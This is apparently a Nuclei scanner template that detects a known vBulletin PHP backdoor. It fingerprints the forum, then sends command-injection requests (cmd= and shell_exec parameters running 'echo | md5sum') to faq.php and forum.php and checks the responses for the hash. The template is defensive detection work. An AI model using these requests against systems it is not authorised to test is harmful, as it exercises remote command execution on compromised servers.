id: vbulletin-backdoor

info:
  name: vBulletin Backdoor - Detect
  author: MaStErCho
  severity: high
  reference:
    - https://github.com/OWASP/vbscan
    - https://blog.sucuri.net/2017/01/vbulletin-malware-hackers-compete-backdoor-control.html
  metadata:
    max-request: 21
  tags: backdoor,php,vbulletin,rce

flow: http(1) && http(2)

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        part: body
        words:
          - "content=\"vBulletin"
          - "id=\"vbulletin_css"
          - "clientscript/vbulletin"
          - "vBulletin_init"
        condition: or
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'

    payloads:
      paths:
        - 'boards'
        - 'board'
        - 'forum'
        - 'forums'
        - 'vb'

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{md5(num)}}')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502202fa822365b053aafd4cd03da9826f7140e6cfd857029a00d083dd3b45a2cce5c022100946ced87dca459a6de74ea9f7c130a746df5abd23ccef62da928695500a06423:922c64590222798bb761d5b6d8e72950